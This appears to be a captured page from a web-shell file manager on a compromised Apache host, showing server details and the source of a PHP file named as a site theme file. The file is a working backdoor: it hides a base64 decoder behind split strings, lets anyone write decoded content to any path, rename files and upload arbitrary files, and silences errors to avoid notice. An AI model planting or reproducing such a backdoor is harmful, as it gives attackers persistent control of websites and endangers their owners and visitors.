HEX
Server: Apache
System: Linux 162-214-74-50.webhostbox.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User: iideug (1011)
PHP: 8.2.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/iideug/public_html/khush.iideug.com/theme-inszkeo.php
<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'ba'.'se64'.'_dec'.'ode'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>